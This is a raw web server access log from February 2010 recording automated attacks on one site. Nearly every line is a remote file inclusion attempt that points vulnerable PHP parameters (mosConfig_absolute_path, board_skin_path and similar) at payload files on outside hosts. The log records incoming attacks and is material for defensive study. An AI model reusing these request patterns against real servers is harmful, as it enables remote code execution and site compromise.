64.15.158.246 - - [13/Feb/2010:08:12:21 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:12:23 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:24 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:24 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:12:31 -0800] "GET /logs/access_100117.log///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:34 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:34 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:34 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:12:42 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:12:42 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:12:43 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:13:49 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:13:52 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:14:16 -0800] "GET /logs/access_100203.log%20%20///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:14:16 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:14:16 -0800] "GET //write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [13/Feb/2010:08:14:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [13/Feb/2010:08:14:20 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [13/Feb/2010:08:14:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [13/Feb/2010:08:14:32 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:14:37 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:15:12 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:15:12 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:15:12 -0800] "GET /logs/access_100114.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:26 -0800] "GET /logs/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:26 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:26 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:27 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:27 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:08:16:27 -0800] "GET /logs/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:16:45 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:16:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:16:46 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:17:26 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:17:26 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:17:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:08:17:37 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:17:58 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:17:58 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:17:58 -0800] "GET /logs/access_100204.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:08:19:11 -0800] "GET /logs/access_100117.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:20:24 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:20:24 -0800] "GET /delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:20:28 -0800] "GET /logs/access_100126.log%20%20//delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:20:35 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:20:35 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:20:36 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:20:41 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:21:26 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:21:26 -0800] "GET /delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:21:30 -0800] "GET /logs/access_100126.log%20%20//delete_all.php?board_skin_path=http://www.wowtop.co.kr/.linux/hard.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:21:35 -0800] "GET /logs/access_100125.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:21:35 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:21:35 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:21:42 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:08:21:55 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:21:58 -0800] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:21:58 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:21:58 -0800] "GET /logs/access_100112.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:22:06 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:22:06 -0800] "GET /logs/access_100125.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:22:06 -0800] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:22:27 -0800] "GET /logs/access_100203.log///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:23:01 -0800] "GET /logs/access_100202.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:23:01 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:23:02 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:23:09 -0800] "GET /logs/access_100112.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [13/Feb/2010:08:23:15 -0800] "GET /logs/access_100201.log%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:23:25 -0800] "GET /logs/access_100114.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:37 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:37 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:37 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:23:37 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:40 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:40 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:23:40 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:23:49 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:47 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:55 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:08:24:55 -0800] "GET /logs/access_100130.log%20%20///?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:24:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:08:24:55 -0800] "GET /logs///?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:08:24:55 -0800] "GET /logs/access_100125.log%20%20///?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:08:24:55 -0800] "GET //?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:25:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:25:05 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:25:05 -0800] "GET /logs/access_100208.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:25:05 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:25:06 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:08:25:06 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:25:31 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:08:25:35 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:26:54 -0800] "GET /logs/access_100202.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:27:02 -0800] "GET /logs/access_100111.log%20%20/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:27:09 -0800] "GET /logs/access_100208.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:27:09 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:27:10 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:27:30 -0800] "GET /logs/access_100112.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:27:30 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:27:30 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:27:34 -0800] "GET /logs/access_100115.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:27:45 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:27:45 -0800] "GET /logs//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:27:47 -0800] "GET /include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:28:36 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:28:37 -0800] "GET /index.php?conteudo=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:28:43 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:28:43 -0800] "GET /logs/access_100129.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [13/Feb/2010:08:28:43 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:28:58 -0800] "GET /include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:28:58 -0800] "GET /logs/access_100202.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:28:59 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
